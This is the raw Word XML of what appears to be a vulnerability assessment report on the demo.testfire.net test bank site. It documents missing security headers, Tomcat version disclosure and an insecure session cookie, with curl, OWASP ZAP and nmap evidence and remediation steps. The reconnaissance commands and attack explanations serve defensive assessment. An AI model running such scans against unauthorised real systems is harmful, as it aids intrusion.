                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  Risk:  High</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  URL:   http://demo.testfire.net/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  Solution: Ensure that your web server, application server, load</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">            balancer, etc. returns the Content-Security-Policy header.</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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Without CSP, if an attacker successfully injects malicious JavaScript (e.g., via XSS), the browser will execute it unconditionally. This enables session hijacking, credential theft, and malware distribution. For a banking application, this means an attacker could silently steal login credentials or redirect payments without the user ever knowing.</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Add a strict Content-Security-Policy header in the web server or application configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Start with a report-only policy to assess impact: Content-Security-Policy-Report-Only: default-src 'self'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enforce: Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; frame-ancestors 'none'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use a CSP nonce or hash for inline scripts rather than allowing 'unsafe-inline'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Validate using Google's CSP Evaluator (https://csp-evaluator.withgoogle.com/).</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OWASP: https://owasp.org/www-project-secure-headers/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MDN: https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE-693: https://cwe.mitre.org/data/definitions/693.html</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VA-02  |  Missing HTTP Strict Transport Security (HSTS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="236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A02:2021 – Cryptographic Failures</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CWE-319: Cleartext Transmission of Sensitive Information</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application does not return a Strict-Transport-Security (HSTS) header in HTTPS responses. HSTS instructs browsers to only ever connect to the domain over HTTPS, even if the user types 'http://' or follows an HTTP link. Without HSTS, users are vulnerable to SSL-stripping attacks and network-level downgrade attacks that intercept cleartext traffic.</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https://demo.testfire.net | grep -i 'strict'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># (no output — Strict-Transport-Security header is absent)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SecurityHeaders.com Grade: F</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  Missing: Strict-Transport-Security</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  Warning: Site is accessible over HTTP without automatic upgrade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Browser DevTools (Network &gt; Response Headers):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  No Strict-Transport-Security header present in any response.</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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Without HSTS, an attacker on the same network (e.g., a coffee shop WiFi) can perform an SSL-strip attack, intercepting the user's HTTPS connection and downgrading it to HTTP. Usernames, passwords, and session tokens are then transmitted in cleartext and fully visible to the attacker. This is especially critical for a banking application handling financial credentials.</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Add the HSTS header to all HTTPS responses: Strict-Transport-Security: max-age=31536000; includeSubDomains; preload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Start with a short max-age (e.g., 300 seconds) for testing, then increase to 31536000 (1 year).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ensure the site functions correctly over HTTPS before enabling HSTS to avoid accidental lockout.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Submit the domain to the HSTS Preload list at https://hstspreload.org/ for browser-level enforcement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Redirect all HTTP traffic to HTTPS using a 301 Permanent Redirect before enforcing HSTS.</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RFC 6797 – HTTP Strict Transport Security: https://tools.ietf.org/html/rfc6797</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP HSTS Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html</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VA-03  |  Missing X-Frame-Options Header (Clickjacking)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="236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A05:2021 – Security Misconfiguration</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CWE-1021: Improper Restriction of Rendered UI Layers</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application does not set the X-Frame-Options or Content-Security-Policy frame-ancestors directive in its HTTP responses. This allows any third-party website to embed the application in an invisible &lt;iframe&gt; element. Attackers can overlay transparent UI elements on top of the legitimate interface, tricking users into clicking buttons they cannot see — a technique known as clickjacking.</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 | grep -i 'x-frame'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># (no output — header is absent)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OWASP ZAP Alert:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  Alert: X-Frame-Options Header Not Set</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  Risk:  Medium (elevated to High for financial applications)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  URL:   http://demo.testfire.net/login.jsp</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  Evidence: No X-Frame-Options header found in response.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Manual Test: Embedding in iframe succeeded from external origin.</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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Clickjacking on a banking login page is extremely dangerous. An attacker can create a malicious webpage that silently loads the bank's login page inside a transparent iframe. The victim believes they are interacting with a harmless page but is actually typing their credentials directly into the bank's login form, which the attacker then captures. Fund transfers can also be triggered without user awareness.</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Add the X-Frame-Options header: X-Frame-Options: DENY (or SAMEORIGIN if framing within the same domain is needed).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Modern approach — use CSP frame-ancestors directive: Content-Security-Policy: frame-ancestors 'none'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">frame-ancestors takes precedence over X-Frame-Options in modern browsers; use both for legacy browser support.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test using the OWASP Clickjacking Test page to confirm the fix is effective.</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OWASP Clickjacking Guide: https://owasp.org/www-community/attacks/Clickjacking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE-1021: https://cwe.mitre.org/data/definitions/1021.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MDN X-Frame-Options: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options</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VA-04  |  Server Version Disclosure (Apache Tomcat)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="C0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A05:2021 – Security Misconfiguration</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CWE-200: Exposure of Sensitive Information</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application's HTTP response headers expose detailed server technology information including the web server type (Apache Tomcat) and version number. Additionally, default Tomcat error pages containing version information are accessible. This information provides an attacker with a roadmap of known CVEs associated with that specific version, significantly reducing the effort required to compromise the server.</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w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP/1.1 200 OK</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Server: Apache-Coyote/1.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">X-Powered-By: Servlet/2.5</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nmap -sV -p 80,443,8080 demo.testfire.net</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">PORT     STATE  SERVICE  VERSION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">80/tcp   open   http     Apache Tomcat/Coyote JSP engine 1.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">443/tcp  open   ssl/http Apache Tomcat/Coyote JSP engine 1.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">8080/tcp open   http     Apache Tomcat/Coyote JSP engine 1.1</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Error page 404: Apache Tomcat/6.0.x — version confirmed.</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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">When an attacker knows the exact server software and version, they can search exploit databases (CVEDetails, ExploitDB, Metasploit) for ready-made exploits. For example, Apache Tomcat 6.x has numerous public CVEs including remote code execution vulnerabilities. This reduces the attack complexity from 'skilled hacker' to 'anyone with internet access and basic knowledge'.</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Suppress the Server header in Apache Tomcat's server.xml: &lt;Connector server=" " /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remove the X-Powered-By header in web.xml or server.xml.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Customize or disable default Tomcat error pages by creating custom error pages in web.xml.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace default Tomcat ROOT application with a minimal placeholder.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Keep the server software patched to the latest stable version regardless of header suppression.</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Tomcat Security Hardening: https://tomcat.apache.org/tomcat-9.0-doc/security-howto.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE-200: https://cwe.mitre.org/data/definitions/200.html</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VA-05  |  Insecure Session Cookie — Missing Secure Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="E36C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A02:2021 – Cryptographic Failures</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CWE-614: Sensitive Cookie Without Secure Attribute</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application sets the session cookie (JSESSIONID) without the Secure flag. The Secure attribute instructs browsers to only transmit the cookie over encrypted HTTPS connections. Without it, the session token is sent in cleartext over HTTP connections, making it trivially interceptable by network-level attackers.</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http://demo.testfire.net/bank/login.aspx</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Set-Cookie: JSESSIONID=ABCDEF1234567890; Path=/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># NOTE: 'Secure' flag is ABSENT from Set-Cookie header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OWASP ZAP Alert:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  Alert: Cookie Without Secure Flag</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  Risk:  Medium</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  Parameter: JSESSIONID</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  Evidence: Set-Cookie: JSESSIONID=...; Path=/</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Browser DevTools (Application &gt; Cookies):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  JSESSIONID | Secure: ☐ (unchecked)</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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">If a user accesses any HTTP page on this domain (even a redirect), their session cookie is transmitted in plaintext. An attacker performing network sniffing (e.g., on shared WiFi) can capture the JSESSIONID token and use it to hijack the user's authenticated session — gaining full access to their bank account without needing their password.</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Set the Secure flag on all authentication and session cookies: Set-Cookie: JSESSIONID=...; Path=/; Secure; HttpOnly; SameSite=Strict</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In Tomcat, configure the session cookie in web.xml: &lt;session-config&gt;&lt;cookie-config&gt;&lt;secure&gt;true&lt;/secure&gt;&lt;/cookie-config&gt;&lt;/session-config&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ensure HTTPS is enforced site-wide so the Secure flag does not prevent cookie transmission.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
